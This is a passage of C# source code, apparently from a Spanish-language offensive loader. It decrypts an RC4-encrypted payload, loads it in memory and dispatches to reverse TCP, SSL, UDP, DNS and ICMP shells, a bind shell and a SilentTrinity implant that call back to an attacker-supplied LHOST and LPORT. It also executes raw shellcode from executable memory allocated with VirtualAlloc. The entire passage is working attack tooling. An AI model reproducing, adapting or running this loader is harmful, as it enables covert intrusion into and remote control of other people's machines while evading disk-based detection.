                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL);
            }
            //#############################################################
            //####################### Cargando dll ########################
            //#############################################################

            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[]   Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[]   Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string   clases   = null;
            Assembly salsongo = null;

            if (funcion != "shellcode")
            {
                salsongo = Assembly.Load(Final_Payload);
                Console.WriteLine("[+] Cargando la salsa en memoria.");
                Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
                foreach (Type infoass in salsongo.GetTypes())
                {
                    var strclase = string.Format("{0}", infoass.Name); clases = strclase;
                }
                ;
            }

            //########################### LLamada a funcion SilentTrinity ########################
            if (funcion == "silenttrinity")
            {
                string[]   argumentos = new string[] { URLSILENT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("lanza");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            //########################### LLamada a funcion Reversa ########################

            if (funcion == "reversetcp")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversessl")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversessl");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "shellcode")
            {
                byte[] sc       = Final_Payload;
                IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
                System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota.");
                Console.WriteLine("[+] Intentando cargar Shellcode");

                try
                {
                    Marshal.Copy(sc, 0, baseAddr, sc.Length);
                    ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));

                    del();
                }
                catch (Exception e)
                {
                    Console.WriteLine(e.Message);
                }
                finally
                {
                    VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
                }
            }
        }